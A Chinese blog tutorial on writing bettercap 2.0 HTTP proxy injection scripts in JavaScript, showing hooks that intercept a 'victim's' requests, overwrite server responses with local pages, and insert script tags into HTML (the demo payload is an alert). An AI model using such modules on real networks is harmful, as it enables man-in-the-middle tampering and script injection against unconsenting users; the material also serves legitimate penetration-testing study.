/文章作者:Kali_MG1937

CNBLOG博客号:ALDYS4

QQ:3496925334/

前言

bettercap已经从1.6更新至2.0版本

语言也从ruby改为了go

编写注入模块指定的语言也从ruby变为了js

模块的编写可以说是更加方便了

那么如何编写bettercap2.0的注入模块呢?

语法明晰

bettercap进入2.0后一些人开始不习惯于新版本注入模块的编写

因为在1.6.2版本中,注入js只需要带上--proxy-module=injectjs参数,接着在--js-data参数中带入欲注入的js语句即可,可以说是非常方便了

但在2.0版本,注入模块的编写语言已经改为js,这让许多没接触过ruby的人有了更大的发挥空间

bettercap官网:http://www.bettercap.org



对于http(s).proxy模块

官方文档的介绍已经很明确了

我这里就对文档的内容进行解释和翻译,并附上自己的理解

0x00 http.proxy.script加载注入模块

这步很简单,只要使用set来设置指定的js文件即可

如:

  1. set http.proxy.script /root/inject.js

0x01 注入模块的语法

注入模块可以更具使用者喜好来编写相应功能的注入模块

这里先对模块语法进行解释

  1. // 当加载proxy时执行onLoad函数
  2. function onLoad() {
  3. //比如你已经set好js文件,使用http.proxy on来加载文件时
  4. //此函数的内容将被执行
  5. }
  7. // 当受害者发送请求时拦截请求内容
  8. function onRequest(req, res) {
  9. //req就是请求的内容,res就是收到的返回内容
  10. }
  12. // 当服务器返回内容给受害者时将其拦截
  13. function onResponse(req, res) {
  14. //req和res和上面一样
  15. }
  17. // 当你在bettercap内执行了一个软件并不自带的命令时执行函数
  18. function onCommand(cmd) {
  19.     if( cmd == "test" ) {
  20.         /*
  21.          * 比如你在软件内输入test并回车,就会触发这个函数
  22.          * 执行相应的代码
  23.          */
  24.         return true
  25.     }
  26. }

0x02 如何编写注入模块

这里先对模块自带的变量进行介绍

变量 介绍
CobtentType 拦截请求/返回的ContentType
Headers 拦截请求/返回的头信息
Status 拦截状态码
Body 拦截请求/返回的内容

在实际编写模块时

应用它们的方法很简单

比如你要拦截服务器返回给受害者信息中的ContentType信息

只需要把它赋予给一个值就好

如:

var a = req.ContentType

如果你要改写服务器返回给受害者的实际内容

只需将req或res参数的对应变量重写即可

如:

req.Body="You were be hacked"

官方也给出了许多骚操作

骚操作之一:网页复写

  1. function onRequest(req, res) {
  2.     res.Status      = 200;//重写状态码
  3.     res.ContentType = "text/html";//重写content
  4.     res.Body        = readFile("caplets/www/index.html");//重写body
  5.     //其中readFile函数也是模块自带的,用于读取本地文件
  6.     headers         = res.Headers.split("\r\n")
  7.     for (var i = 0; i < headers.length; i++) {
  8.         header_name = headers[i].replace(/:.*/, "")
  9.         res.RemoveHeader(header_name);
  10.     }//删除返回信息的头信息
  11.     res.SetHeader("Connection", "close");//增加一个头信息
  12. }

该模块可以在受害者发出任何请求时复写服务器返回的真实内容

骚操作之二:在返回中注入代码

  1. function onResponse(req, res) {
  2.     if( res.ContentType.indexOf('text/html') == 0 ){
  3.     //若content的格式是text/html
  4.         var body = res.ReadBody();//读取body
  5.         if( body.indexOf('') != -1 ) {//若头标签存在
  6.             res.Body = body.replace(
  7.                 '',
  8.                 '<script type="text/javascript">' + "\n" +
  9.                     'alert("bettercap")' +
  10.                 '</script>' +
  11.                 ''
  12.             ); //则在头标签内注入代码
  13.         }
  14.     }
  15. }

顾名思义,替换指定标签或内容,在其中插入恶意代码

不只这些,有兴趣的可以看看bettercap作者的github

https://github.com/bettercap/caplets

这是作者自己写的模块,各种骚操作都有

还有一些模块自带的参数由于篇幅限制没法一一说明

可以自己去官网查看文档

实际应用

我根据这些原理自己利用python开发了一个小工具

BEST

全称:BettercapEvilScriptTool

开发该工具的初衷是想快捷地构造注入模块

虽然代码还在雏形期,但我还是先开源吧







代码开源:

https://pan.baidu.com/s/1buTP8aHqoP84zDeP6cMulQ

【工具解析】瑞士军刀bettercap2.X解析_第一期_编写HTTP代理注入模块_http(s).proxy.script的更多相关文章

  1. ArcGIS for Desktop入门教程_第一章_引言 - ArcGIS知乎-新一代ArcGIS问答社区

    原文:ArcGIS for Desktop入门教程_第一章_引言 - ArcGIS知乎-新一代ArcGIS问答社区 1 引言 1.1 读者定位 我们假设用户在阅读本指南前应已具备以下知识: · 熟悉W ...

  2. 【工具解析】瑞士军刀bettercap2.X_解析_第二期_内网钓鱼(嗅探)工具编写

    /文章作者:Kali_MG1937 CNBLOG博客:ALDYS4 QQ:3496925334/ 第一期: https://www.cnblogs.com/aldys4/p/14877783.html ...

  3. Python笔记_第一篇_面向过程_第一部分_8.画图工具(小海龟turtle)

    turtle 是一个简单的绘图工具. 提供一个小海龟,可以把它理解为一个机器人,只能听懂有限的命令,且绘图窗口的原点(0,0)在中间,默认海龟的方向是右侧海龟的命令包括三类:运动命令.笔画控制命令.其 ...

  4. Python笔记_第一篇_面向过程_第一部分_2.内存详解

    Python的很多教材中并没有讲内存方面的知识,但是内存的知识非常重要,对于计算机工作原理和方便理解编程语言是非常重要的,尤其是小白,因此需要把这一方面加上,能够更加深入的理解编程语言.这里引用了C语 ...

  5. Python笔记_第一篇_面向过程_第一部分_6.条件控制语句(if)

    Python正如其他语言一样存在两种常用的逻辑判断体(也叫结构化程序设计).所谓逻辑判断体是通过你想要完成的编程思路,通过在逻辑判断体中的相互判断和作用得到你想要的结果.逻辑判断体也叫控制语句,Pyt ...

  6. Python笔记_第一篇_面向过程_第一部分_0.开场白

    *什么是Python? Python是一种面向对象的解释型计算机程序设计语言,由荷兰人Guido(吉多) van Rossum于1989年发明,第一个公开版本发行于1991年.在国外应用非常的广泛,国 ...

  7. Python笔记_第一篇_面向过程_第一部分_9.Ubuntu基础操作

    第一部分   Ubuntu简介 Ubuntu(乌班图)是一个机遇Debian的以桌面应用为主的Linux操作系统,据说其名称来自非洲南部祖鲁语或科萨语的“Ubuntu”一词,意思是“人性”.“我的存在 ...

  8. SQL时间第一期_获取系统年月日时分秒

    select GETDATE() as '当前日期',DateName(year,GetDate()) as '年',DateName(month,GetDate()) as '月',DateName ...

  9. COM编程_第一讲_深入COM框架以及实现简单的COM

    一丶我们要理解COM是什么(为什么理解) 现在很多人会用com(也就是ALT)但是不知道原理,如果改一点东西,那么整体的框架重来,因为你不懂改哪里,如果懂了,那么遇到问题,那么就会知道我要怎么做,是什 ...

随机推荐

  1. Linux-鸟菜-1-Linux简介

    Linux-鸟菜-1-Linux简介 鸟哥这一章是介绍了Linux的由来以及建议怎么学Linux.很多也是建议性的东西,概念性的东西(当然我不是排斥概念).把最后鸟哥的汇总粘过来吧. 建议大家去看下这 ...

  2. PowerDesigner安装教程

    准备安装 准备好可执行文件.汉化.破解文件 将可执行文件以管理员身份运行: 向导初始化 next 选香港.点同意: 可以默认,如果说这个路径不能用下次就换一个 除了Eclipse全选 全选 好像有个空 ...

  3. ERROR: Failed to Setup IP tables: Unable to enable SKIP DNAT rule

    解释:执行docker-compose up -d时出现ERROR: Failed to Setup IP tables: Unable to enable SKIP DNAT rule 原因:防火墙 ...

  4. spring boot 与 Mybatis整合(*)

    在pom.xml文件中加入数据库.spring-mybatis整合 <!-- spring boot 整合mybatis --> <dependency> <groupI ...

  5. 1、requests基础

    一.升级pip版本的命令 : python -m pip install --upgrade pip 二.requests安装  windows系统系cmd运行 pip install request ...

  6. 老Python带你从浅入深探究List

    列表 Python中的列表(list)是最常用的数据类型之一. Python中的列表可以存储任意类型的数据,这与其他语言中的数组(array)不同. 被存入列表中的内容可称之为元素(element)或 ...

  7. ConcurrentHashMap源码解读三

    今天首先讲解helpTransfer方法 final Node<K,V>[] helpTransfer(Node<K,V>[] tab, Node<K,V> f) ...

  8. Canal详细入门实战(使用总结)

    Canal介绍 Canal简介 canal [kə'næl],译意为水道/管道/沟渠,主要用途是基于 MySQL 数据库增量日志解析,提供增量数据订阅和消费 早期阿里巴巴因为杭州和美国双机房部署,存在 ...

  9. 【BUAA 软工热身作业】继往开来,勇攀高峰

    项目 内容 课程:2020春季软件工程课程博客作业(罗杰,任健) 博客园班级链接 作业:热身作业,阅读并撰写博客 作业要求 课程目标 学习大规模软件开发的技巧与方法,锻炼开发能力 作业目标 学习前辈经 ...

  10. [Java]数据分析--聚类

    距离度量 需求:计算两点间的欧几里得距离.曼哈顿距离.切比雪夫距离.堪培拉距离 实现:利用commons.math3库相应函数 1 import org.apache.commons.math3.ml ...